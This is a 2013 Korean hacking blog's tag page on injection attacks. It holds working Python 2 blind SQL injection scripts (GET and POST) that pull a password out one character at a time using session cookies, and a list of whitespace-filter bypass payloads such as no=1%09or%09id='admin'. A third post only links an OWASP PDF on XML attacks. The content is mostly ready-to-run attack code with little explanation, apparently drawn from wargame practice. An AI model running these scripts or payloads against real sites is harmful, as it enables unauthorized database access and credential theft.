Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/5 »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
 

'injection'에 해당되는 글 3

  1. 2013.08.28 XML Attack Surface
  2. 2013.03.04 Python Blind Injection Sample
  3. 2013.03.04 SQL Injection 공백 우회방법
 

XML Attack Surface

Webhacking | 2013. 8. 28. 04:26 | Posted by binaryU

설명이 필요 없음.


그냥 첨부물 보고 이해되면 다행이고, 뭔 소린지 모르면, 설명을 해도 소용 없음.


owasp2013-pierreernst-xmlattacksurface-130122204804-phpapp02.pdf


저작자표시

'Webhacking' 카테고리의 다른 글

Python Blind Injection Sample  (0) 2013.03.04
SQL Injection 공백 우회방법  (0) 2013.03.04
[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
webhacking.kr 9번 문제 풀이  (1) 2013.03.04
:

Python Blind Injection Sample

Webhacking | 2013. 3. 4. 02:07 | Posted by binaryU

[GET 방식 샘플]


import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password=""

for j in range(1,100):
   print "%d" %j
   for i in range(33,126):
       url="http://binaryu.tistory.com/index.php?no=2+and+substring(pw,%d,1)=char(%d)" %(j,i)
       req=urllib2.Request(url)
       req.add_header('Cookie',"notice=yes; PHPSESSID=863fc9ebeb49ef2bb20976baed9de368")
       read=urllib2.urlopen(req).read()
       ok = re.findall("True",read)
       if ok:
           password=password+chr(i)
           print password
           break



[POST 방식 샘플]


import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password=""

for j in range(1, 33):
   for i in range(48,123):
      if i < 58 or i > 96:
          url="http://binaryu.tistory.com/index.php"
          login_form={"id": "admin' and substr(pw,%d,1)=char(%s)#" %(j,i), "pw": ""}
          login_req=urllib.urlencode(login_form)
          req=urllib2.Request(url,login_req)
          req.add_header('Cookie',"notice=yes; PHPSESSID=c473aaff2c3d93c21ad8a0a2cf505036")
          read=urllib2.urlopen(req).read()
          ok = re.findall("Wrong password!",read)
          if ok:
              password=password+chr(i)
              print password
              break


저작자표시

'Webhacking' 카테고리의 다른 글

XML Attack Surface  (0) 2013.08.28
SQL Injection 공백 우회방법  (0) 2013.03.04
[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
webhacking.kr 9번 문제 풀이  (1) 2013.03.04
:

SQL Injection 공백 우회방법

Webhacking | 2013. 3. 4. 01:47 | Posted by binaryU

SQL Injection 공격시 공백 문자 필터링시 우회 방법

 

1. Tab : %09

  - no=1%09or%09id='admin'

 

2. Line Feed (\n): %0a

  - no=1%0aor%0aid='admin'

 

3. Carrage Return(\r) : %0d

  - no=1%0dor%0did='admin'

 

4. 주석 : /**/

  - no=1/**/or/**/id='admin'

 

5. 괄호 : ()

  - no=(1)or(id='admin')

 

6. 더하기 : +

  - no=1+or+id='admin'

저작자표시

'Webhacking' 카테고리의 다른 글

XML Attack Surface  (0) 2013.08.28
Python Blind Injection Sample  (0) 2013.03.04
[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
webhacking.kr 9번 문제 풀이  (1) 2013.03.04
:
 

티스토리툴바